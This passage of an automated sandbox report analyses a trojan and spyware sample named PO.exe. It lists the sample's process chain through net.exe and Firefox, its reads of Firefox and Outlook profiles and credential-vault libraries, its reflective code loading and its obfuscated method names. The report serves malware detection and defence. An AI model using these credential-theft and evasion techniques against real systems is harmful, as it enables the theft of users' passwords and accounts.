                Source: 0.2.PO.exe.ba90000.5.raw.unpack, ig4bTw1peNbeeam7US.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, ig4bTw1peNbeeam7US.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, yQbVrTc8MDjXSoBqhr.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, yQbVrTc8MDjXSoBqhr.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, yQbVrTc8MDjXSoBqhr.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, ig4bTw1peNbeeam7US.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, ig4bTw1peNbeeam7US.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, yQbVrTc8MDjXSoBqhr.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, yQbVrTc8MDjXSoBqhr.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, yQbVrTc8MDjXSoBqhr.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, ig4bTw1peNbeeam7US.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, ig4bTw1peNbeeam7US.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@5/5
                Source: C:\Users\user\Desktop\PO.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO.exe.logJump to behavior
                Source: C:\Users\user\Desktop\PO.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\net.exeFile created: C:\Users\user\AppData\Local\Temp\35859UlfLqJump to behavior
                Source: PO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: PO.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\PO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: net.exe, 00000007.00000003.2472874960.0000000000664000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.3002318934.0000000000688000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000003.2472874960.0000000000688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: PO.exeVirustotal: Detection: 69%
                Source: PO.exeReversingLabs: Detection: 67%
                Source: unknownProcess created: C:\Users\user\Desktop\PO.exe "C:\Users\user\Desktop\PO.exe"
                Source: C:\Users\user\Desktop\PO.exeProcess created: C:\Users\user\Desktop\PO.exe "C:\Users\user\Desktop\PO.exe"
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"
                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\PO.exeProcess created: C:\Users\user\Desktop\PO.exe "C:\Users\user\Desktop\PO.exe"Jump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\PO.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: PO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: PO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: net.pdbUGP source: PO.exe, 00000002.00000002.2274931580.0000000001267000.00000004.00000020.00020000.00000000.sdmp, vfAu7gBmmnuGpQ5Y.exe, 00000006.00000002.3002888129.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: PO.exe, 00000002.00000002.2275360334.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000007.00000002.3004329327.0000000002FBE000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000007.00000003.2281965657.0000000002C72000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000003.2278704167.0000000000978000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.3004329327.0000000002E20000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: PO.exe, PO.exe, 00000002.00000002.2275360334.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, net.exe, net.exe, 00000007.00000002.3004329327.0000000002FBE000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000007.00000003.2281965657.0000000002C72000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000003.2278704167.0000000000978000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.3004329327.0000000002E20000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: net.pdb source: PO.exe, 00000002.00000002.2274931580.0000000001267000.00000004.00000020.00020000.00000000.sdmp, vfAu7gBmmnuGpQ5Y.exe, 00000006.00000002.3002888129.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: vfAu7gBmmnuGpQ5Y.exe, 00000006.00000002.3002681126.000000000097F000.00000002.00000001.01000000.0000000C.sdmp, vfAu7gBmmnuGpQ5Y.exe, 00000008.00000002.3002866033.000000000097F000.00000002.00000001.01000000.0000000C.sdmp

                Data Obfuscation

                barindex
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, yQbVrTc8MDjXSoBqhr.cs.Net Code: fY0pZVFRhc System.Reflection.Assembly.Load(byte[])
                Source: 0.2.PO.exe.409a508.1.raw.unpack, MainForm.cs.Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, yQbVrTc8MDjXSoBqhr.cs.Net Code: fY0pZVFRhc System.Reflection.Assembly.Load(byte[])
                Source: 0.2.PO.exe.40ba528.2.raw.unpack, MainForm.cs.Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.PO.exe.ba90000.5.raw.unpack, yQbVrTc8MDjXSoBqhr.cs.Net Code: fY0pZVFRhc System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0141E958 pushfd ; retf 0_2_0141E959
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0759BA10 push cs; ret 0_2_0759BA11
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_076A19CD push FFFFFF8Bh; iretd 0_2_076A19CF
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_079045E0 push eax; ret 0_2_079045E1
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_00413863 push ecx; retf E958h2_2_00413919
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_00401868 push 0000003Dh; retf 2_2_00401899
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_00417828 push esi; iretd 2_2_00417848
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0041F0C3 push edi; iretd 2_2_0041F0CF
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_004031B0 push eax; ret 2_2_004031B2
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_00404B72 push edi; ret 2_2_00404B7A
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0041738C push ds; retf 2_2_004173A1
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_004083BA push esi; iretd 2_2_004083F5
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_00404C4C pushfd ; ret 2_2_00404C4D
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0041556F push eax; retf 2_2_00415572
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_004145BD push 00000034h; iretd 2_2_004145BF
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_00415EBF push esp; iretd 2_2_00415ECC
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F09AD push ecx; mov dword ptr [esp], ecx2_2_016F09B6
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeCode function: 6_2_02B1120C push esp; iretd 6_2_02B11219
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeCode function: 6_2_02B12B74 push esi; iretd 6_2_02B12B95
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeCode function: 6_2_02B108BC push eax; retf 6_2_02B108BF
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeCode function: 6_2_02B118FB push edx; retf 6_2_02B11901
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeCode function: 6_2_02AFFEBF push edi; ret 6_2_02AFFEC7
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeCode function: 6_2_02B126D9 push ds; retf 6_2_02B126EE
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeCode function: 6_2_02AFFF99 pushfd ; ret 6_2_02AFFF9A
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeCode function: 6_2_02B03707 push esi; iretd 6_2_02B03742
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E509AD push ecx; mov dword ptr [esp], ecx7_2_02E509B6
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_004341D9 push ds; retf 7_2_004341EE
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_00438440 push esi; iretd 7_2_0043844A
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_00438438 push esi; iretd 7_2_0043844A
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_00434675 push esi; iretd 7_2_00434695
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_004306B0 push ecx; retf E958h7_2_00430766
                Source: PO.exeStatic PE information: section name: .text entropy: 7.77210370453255
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, av7ulbitoKQtA90BkM.csHigh entropy of concatenated method names: 'gxVQrX66Qs', 'BIaQ4faSwJ', 'rpFQE95QvW', 'cHxQ6rMHw4', 'fjhQcwqVCl', 'pWkE0V0FAs', 'fytE8JaDUe', 'tCaE5u4XcV', 'RFfEHqbDKo', 'NaQEticUjp'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, c8E47WY3nR71XXLfsaI.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bf1TX2cyQZ', 'nJ5TWy9tKA', 'z37Tqt66FR', 'lkxTVsBumd', 'dbXTO4lWWV', 'njWTBh6NpB', 'L9ETekNkdC'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, bShmESM9SRrFA60ikF.csHigh entropy of concatenated method names: 'kB1ZIfPVf', 'NiLGgX98K', 'GWSD91EeN', 'F9KNvGmte', 'f7Dw8D4BJ', 'mxhxdBwBh', 'wjibBV2G2E9k6Zc9vd', 'EKR5CR7wRb4PFrrwQj', 'hXmKEbZTv', 'csaTqtnCv'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, GmfL8EwbHBh6yTtkOA.csHigh entropy of concatenated method names: 'eESoGpkep6', 'nfQoDiPZGi', 'AFWo1UUTBj', 'lg5owigcPg', 'nQYovpYH6v', 'WZGoInTMpl', 'QHioRli6ol', 'D5VoKVDUbW', 'jXdom9tg9P', 'BGqoT3yU8a'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, hlw9yp8pLPs8k0TdZx.csHigh entropy of concatenated method names: 'vAkRHEDXel', 'vdxRfHwWPC', 'I0KK3HeCCU', 'yv5KY6lCpp', 'yBYRXx0Aa0', 'k67RWjMJH1', 'oNsRqNy5qX', 'DhPRVUKNGB', 'J4bROZdv1w', 'UIIRBby8WM'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, IVOaPb56Xb9OTkQI7M.csHigh entropy of concatenated method names: 'zsJmv6WFyg', 'dfymRc5Uhg', 'KRNmmuJOEq', 'IsjmLhTMEt', 'zfXmsqLC6i', 'bT8mgT6lNP', 'Dispose', 'bC7KUwkUOY', 'JAGK48EQnI', 'eecKoTKaSP'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, kud7D5zoOcgaQh10wk.csHigh entropy of concatenated method names: 'PCiTDs15Zn', 'csFT14Qigy', 'PL1Twt6eVv', 'P3BTi1enV7', 'bw9TSwNDfC', 'kqHTyXC1ap', 'du6TjcFYnC', 'n3oTgn7Vts', 'ROsTP0jrsE', 'J4kTbjFFVQ'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, aFGfLmtI0beEl6pkeH.csHigh entropy of concatenated method names: 'RBcmiRUW2T', 'QeemSVZh0k', 'W2qmhgaUV9', 'z02myKJgik', 'ycEmjPl8J8', 'vGYmuU65Si', 'yt6m24syK9', 'ko0maksEEM', 'C7ymdUJdWJ', 'wfWm7Ql8As'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, FaSxNGoXstTskEWaLl.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'XgnMt0rHEu', 'QasMfmVrQ3', 'lO3MzaBFnF', 'Lp3k3ZLnOK', 'BALkYrYoCS', 'OKikMoNOc6', 'k19kk7p4kU', 'o9gh5wm1vH21iZdbKDF'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, jhT1XiYpCdoDYbJXImm.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VlfnmGo12P', 'jAEnTO96AP', 'pkMnLjpDvf', 'F4bnn6HHwR', 'drxns2EHXc', 'nmSnAbsJqN', 'uVlngLZHX7'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, cV34pg4nlMsrLlgM57.csHigh entropy of concatenated method names: 'Dispose', 'y9OYtTkQI7', 'kFFMSwmVm0', 'DLr6wSy5o2', 'ci7YftxOjc', 'XBnYzfufQL', 'ProcessDialogKey', 'to3M3FGfLm', 'p0bMYeEl6p', 'deHMM8246S'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, JjfvtCpQ90QHC8YwOa.csHigh entropy of concatenated method names: 'qhQY6g4bTw', 'deNYcbeeam', 'hbHYlBh6yT', 'XkOYFAumRl', 'FWdYvx63v7', 'KlbYItoKQt', 'kD4UKlWQr2LA4Eya17', 'hLtNQ1cDfw24HSW5WT', 'FBEYYLo8si', 'XgeYkqig9o'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, GPgPkY2haQbtV4AXYS.csHigh entropy of concatenated method names: 'mBj6U6X0sQ', 'k2t6ocAH0D', 'XFA6Qev4re', 'EcxQfXGRFN', 'Or3QzPtbHa', 'ldn63GBU4x', 'nSI6YVBNYS', 'YY76Mp5w6w', 'IwU6kvasYh', 'Unu6pKLtYk'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, yQbVrTc8MDjXSoBqhr.csHigh entropy of concatenated method names: 'I0TkrMi9YH', 'bp1kUD7LEb', 'XWMk46QZU2', 'c8CkokmOq5', 'YXskEHW5kX', 'KF3kQiux3l', 'GKrk68oABi', 'UcpkcZqhkO', 'qR6kJ9lbx2', 'QQqklirKsB'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, YfEwfPq0cNftvy77Y3.csHigh entropy of concatenated method names: 'Bt0C1Kf9cL', 'FKBCw2s2ip', 'JNdCiAjCYG', 'g8NCSttm9i', 'zFyCynAK4O', 'QoTCjhhK9T', 'enjC2iEZpl', 'KWcCalifbe', 'QGbC7Oousx', 'nGBCXiW6W3'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, KmRl7VxlriI9kxWdx6.csHigh entropy of concatenated method names: 'tGhE9KfFQs', 'fquENbN3ff', 'OTGohwWpFS', 'zH1oy2Th0G', 'n9Loj0tclK', 'MaKou33yKu', 'uEPo2322gY', 'unSoalFD1x', 'OZ0odxkUMX', 'mDro7CV8Wj'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, V246SPfLB9B0nkmoR9.csHigh entropy of concatenated method names: 'pQnTo7LBJp', 'bnjTEx1ZhC', 'TdVTQ8JDpm', 'iTAT6JaVd3', 'M8aTmDHgRm', 'fviTcM48Xa', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, ig4bTw1peNbeeam7US.csHigh entropy of concatenated method names: 'lBM4VqfqQl', 'iHo4OYIcdQ', 'b4M4BTRVWN', 'M7c4ec5VQZ', 'wEJ40qujJn', 'TEu48aJeDG', 'GIH456t9gw', 'VhY4HHnp2D', 'ISB4t6tKMT', 'AbH4f5RAuT'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, OIjuNTe8TPtPScTDyL.csHigh entropy of concatenated method names: 'n6cRlZTS0t', 'EwSRFtsAhM', 'ToString', 'pL1RUB5bfm', 'VMuR4VbOgn', 'OCMRojeeO4', 'R1eREbW6Wy', 'XCcRQNGijL', 'PEOR6ldLg4', 'BeGRcqiUdU'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, Q5Zb9HBTdH5ROZccae.csHigh entropy of concatenated method names: 'ToString', 'G4TIXtMPYN', 'gy2IShOp7C', 'MgcIhwVmkj', 'LuCIyTdv4u', 'RXKIj9O8dK', 'keQIunAV1g', 'p97I2d2eJ6', 'TZVIayWwDg', 'u9qIdePS2r'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, LJXv6mVmARH9qRMaNn.csHigh entropy of concatenated method names: 'fiOv7KGPsT', 'emYvWAKdp5', 'e9ovVlVeZo', 'sw0vOvlufw', 'fVXvStrq6i', 'KigvhPKDOp', 'yP0vy9RAVQ', 'jYFvj4ZdTp', 'jdBvu60lmG', 'Q0Gv2YMMHq'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, PpQpfidHiMBRwlNE5t.csHigh entropy of concatenated method names: 'Qr76PJplyu', 'Nxf6bvrtVu', 'nS16Zy7H48', 'eWf6G16jeb', 'PDu69cMdIR', 'Kho6Dbl71Q', 'QOE6N9u5on', 'Jrp61gmJIr', 'knV6wfoyeu', 'ln96xjhx1c'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, TyBLcDYYLbql4ngERhe.csHigh entropy of concatenated method names: 'B0vTfUnHmk', 'TlqTzW3B94', 'ELcL3mnwqk', 'BCULYFJFdv', 'NT2LM5GvkT', 'pTILk9nBXT', 'AYXLpKUQiq', 'GqTLrV1De1', 'sVHLU2Pcyj', 'NAqL4kk2qX'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, av7ulbitoKQtA90BkM.csHigh entropy of concatenated method names: 'gxVQrX66Qs', 'BIaQ4faSwJ', 'rpFQE95QvW', 'cHxQ6rMHw4', 'fjhQcwqVCl', 'pWkE0V0FAs', 'fytE8JaDUe', 'tCaE5u4XcV', 'RFfEHqbDKo', 'NaQEticUjp'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, c8E47WY3nR71XXLfsaI.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bf1TX2cyQZ', 'nJ5TWy9tKA', 'z37Tqt66FR', 'lkxTVsBumd', 'dbXTO4lWWV', 'njWTBh6NpB', 'L9ETekNkdC'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, bShmESM9SRrFA60ikF.csHigh entropy of concatenated method names: 'kB1ZIfPVf', 'NiLGgX98K', 'GWSD91EeN', 'F9KNvGmte', 'f7Dw8D4BJ', 'mxhxdBwBh', 'wjibBV2G2E9k6Zc9vd', 'EKR5CR7wRb4PFrrwQj', 'hXmKEbZTv', 'csaTqtnCv'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, GmfL8EwbHBh6yTtkOA.csHigh entropy of concatenated method names: 'eESoGpkep6', 'nfQoDiPZGi', 'AFWo1UUTBj', 'lg5owigcPg', 'nQYovpYH6v', 'WZGoInTMpl', 'QHioRli6ol', 'D5VoKVDUbW', 'jXdom9tg9P', 'BGqoT3yU8a'
                Source: 0.2.PO.exe.4b10d18.0.raw.unpack, hlw9yp8pLPs8k0TdZx.csHigh entropy of concatenated method names: 'vAkRHEDXel', 'vdxRfHwWPC', 'I0KK3HeCCU', 'yv5KY6lCpp', 'yBYRXx0Aa0', 'k67RWjMJH1', 'oNsRqNy5qX', 'DhPRVUKNGB', 'J4bROZdv1w', 'UIIRBby8WM'
